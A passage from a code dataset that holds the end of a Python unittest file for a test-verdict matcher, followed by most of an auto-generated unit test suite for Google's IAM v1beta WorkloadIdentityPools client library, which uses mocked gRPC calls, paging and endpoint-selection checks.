result, non_existing_test_name
)
self.assertEqual(f"Test {non_existing_test_name} not found.", str(cm.exception))
def test_exception_is_thrown_when_test_verdict_is_missing(self):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
====================
Running test (2/2): examples/{second_test_name}
Verdict: FAIL
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_fail(result, first_test_name)
self.assertEqual(
f"Test verdict (for {first_test_name}) not found.", str(cm.exception)
)
def test_exception_is_thrown_when_test_verdict_is_missing_due_to_cutted_output(
self,
):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
Verdict: FAIL
====================
Running test (2/2): examples/{second_test_name}
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_fail(result, second_test_name)
self.assertEqual(
f"Test verdict (for {second_test_name}) not found.", str(cm.exception)
)
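
# Illustrative invocation (a hedged note, not part of the original file):
# assuming the package layout implied by the relative import above, the suites
# run under the standard library test runner, e.g.
#
#   python -m unittest systemtests.common.test_TestExecutionMatchers -v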
| 34.617188 | 124 | 0.690702 | 1,091 | 8,862 | 5.224565 | 0.101742 | 0.071579 | 0.050175 | 0.05614 | 0.880526 | 0.873509 | 0.870351 | 0.840877 | 0.822456 | 0.8 | 0 | 0.006104 | 0.205033 | 8,862 | 255 | 125 | 34.752941 | 0.802981 | 0.014782 | 0 | 0.666667 | 0 | 0.015873 | 0.195393 | 0.057415 | 0 | 0 | 0 | 0 | 0.179894 | 1 | 0.111111 | false | 0.142857 | 0.015873 | 0 | 0.153439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
83a7955119dcaf8cde3653451d9c3069598640f4 | 176,941 | py | Python | google/iam/v1beta/iam-v1beta-py/tests/unit/gapic/iam_v1beta/test_workload_identity_pools.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/iam/v1beta/iam-v1beta-py/tests/unit/gapic/iam_v1beta/test_workload_identity_pools.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/iam/v1beta/iam-v1beta-py/tests/unit/gapic/iam_v1beta/test_workload_identity_pools.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.iam_v1beta.services.workload_identity_pools import WorkloadIdentityPoolsAsyncClient
from google.iam_v1beta.services.workload_identity_pools import WorkloadIdentityPoolsClient
from google.iam_v1beta.services.workload_identity_pools import pagers
from google.iam_v1beta.services.workload_identity_pools import transports
from google.iam_v1beta.services.workload_identity_pools.transports.base import _GOOGLE_AUTH_VERSION
from google.iam_v1beta.types import workload_identity_pool
from google.iam_v1beta.types import workload_identity_pool as gi_workload_identity_pool
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(None) is None
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
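# For reference, the mapping exercised above (a hedged restatement of the
# asserts, not generated code):
#   example.googleapis.com         -> example.mtls.googleapis.com
#   example.sandbox.googleapis.com -> example.mtls.sandbox.googleapis.com
#   api.example.com                -> api.example.com  (non-Google hosts pass through)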
@pytest.mark.parametrize("client_class", [
WorkloadIdentityPoolsClient,
WorkloadIdentityPoolsAsyncClient,
])
def test_workload_identity_pools_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'iam.googleapis.com:443'
@pytest.mark.parametrize("transport_class,transport_name", [
(transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_workload_identity_pools_client_service_account_always_use_jwt(transport_class, transport_name):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [
WorkloadIdentityPoolsClient,
WorkloadIdentityPoolsAsyncClient,
])
def test_workload_identity_pools_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'iam.googleapis.com:443'
def test_workload_identity_pools_client_get_transport_class():
transport = WorkloadIdentityPoolsClient.get_transport_class()
available_transports = [
transports.WorkloadIdentityPoolsGrpcTransport,
]
assert transport in available_transports
transport = WorkloadIdentityPoolsClient.get_transport_class("grpc")
assert transport == transports.WorkloadIdentityPoolsGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(WorkloadIdentityPoolsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsClient))
@mock.patch.object(WorkloadIdentityPoolsAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsAsyncClient))
def test_workload_identity_pools_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(WorkloadIdentityPoolsClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(WorkloadIdentityPoolsClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc", "true"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc", "false"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(WorkloadIdentityPoolsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsClient))
@mock.patch.object(WorkloadIdentityPoolsAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_workload_identity_pools_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_workload_identity_pools_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_workload_identity_pools_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_workload_identity_pools_client_client_options_from_dict():
with mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = WorkloadIdentityPoolsClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_list_workload_identity_pools(transport: str = 'grpc', request_type=workload_identity_pool.ListWorkloadIdentityPoolsRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse(
next_page_token='next_page_token_value',
)
response = client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolsPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_workload_identity_pools_from_dict():
test_list_workload_identity_pools(request_type=dict)
def test_list_workload_identity_pools_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
client.list_workload_identity_pools()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolsRequest()
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.ListWorkloadIdentityPoolsRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolsResponse(
next_page_token='next_page_token_value',
))
response = await client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolsAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async_from_dict():
await test_list_workload_identity_pools_async(request_type=dict)
def test_list_workload_identity_pools_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse()
client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_workload_identity_pools_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolsResponse())
await client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_workload_identity_pools_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_workload_identity_pools(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_workload_identity_pools_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_workload_identity_pools(
workload_identity_pool.ListWorkloadIdentityPoolsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_workload_identity_pools_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_workload_identity_pools(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pools_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_workload_identity_pools(
workload_identity_pool.ListWorkloadIdentityPoolsRequest(),
parent='parent_value',
)
def test_list_workload_identity_pools_pager():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_workload_identity_pools(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPool)
for i in results)
def test_list_workload_identity_pools_pages():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
pages = list(client.list_workload_identity_pools(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async_pager():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
async_pager = await client.list_workload_identity_pools(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPool)
for i in responses)
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async_pages():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_workload_identity_pools(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_get_workload_identity_pool(transport: str = 'grpc', request_type=workload_identity_pool.GetWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPool(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPool.State.ACTIVE,
disabled=True,
)
response = client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPool)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
